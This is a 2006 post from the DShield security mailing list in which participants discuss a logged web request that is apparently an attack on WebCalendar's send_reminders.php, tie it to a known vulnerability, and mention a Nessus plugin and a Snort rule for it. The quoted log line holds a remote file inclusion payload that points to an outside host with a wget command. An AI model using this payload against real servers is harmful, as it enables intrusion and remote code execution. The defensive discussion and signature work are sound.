[Dshield] Webcal Exploit?
frank at knobbe.us
Mon Feb 6 23:52:38 GMT 2006
On Mon, 2006-02-06 at 14:35 -0500, George A. Theall wrote:
> > 184.108.40.206 - - [05/Feb/2006:12:36:47 -0500] "GET
> > http://220.127.116.11/Webcal42/tools/send_reminders.php?includedir=http://www.58club.net/bbs/xpl/cse.gif?&cmd=wget
> > HTTP/1.0" 302 290
> Yes, that's from BID 14651. I wrote a Nessus plugin for that last
I see your August and raise you March. Seems like we had a BleedingSnort
rule for this at least since March 2005.
Thanks for the BID reference, I'll add that shortly to the sig.
It is said that the Internet is a public utility. As such, it is best
compared to a sewer. A big, fat pipe with a bunch of crap sloshing
against your ports.
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Size: 187 bytes
Desc: This is a digitally signed message part
Url : http://www.dshield.org/pipermail/list/attachments/20060206/a412839f/attachment.bin
More information about the list